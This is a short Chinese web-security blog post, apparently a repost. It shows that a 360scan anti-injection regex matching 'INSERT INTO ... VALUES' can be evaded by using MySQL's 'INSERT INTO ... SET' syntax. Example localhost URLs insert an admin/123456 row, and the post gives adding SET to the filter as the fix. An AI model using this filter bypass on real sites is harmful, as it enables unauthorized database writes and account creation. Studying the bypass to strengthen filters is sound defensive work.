热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

Mysql Insert into set语法绕过360scan insert防注入

发布时间:2014-04-30 09:52文章来源:网络文章作者:园长MM 点击次数:
摘要:360scan正则:INSERT\\s+INTO.+?VALUES 其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx = 提交: 1 http://localhost/360.php?sql= insert into user ( user ,pass) values ( 'admin' , '123456' ) 提交set语法: 1 ht...

360scan正则:INSERT\\s+INTO.+?VALUES

其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx =

提交:

1
http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123456')

2

提交set语法:

1
http://localhost/360.php?sql=insert into user set user='admin',pass='123456'

1

修复方法当然最好是加上set了。

标签分类:

上一篇:header头referer字段反射xss利用
下一篇:Webshell下命令执行限制及绕过方法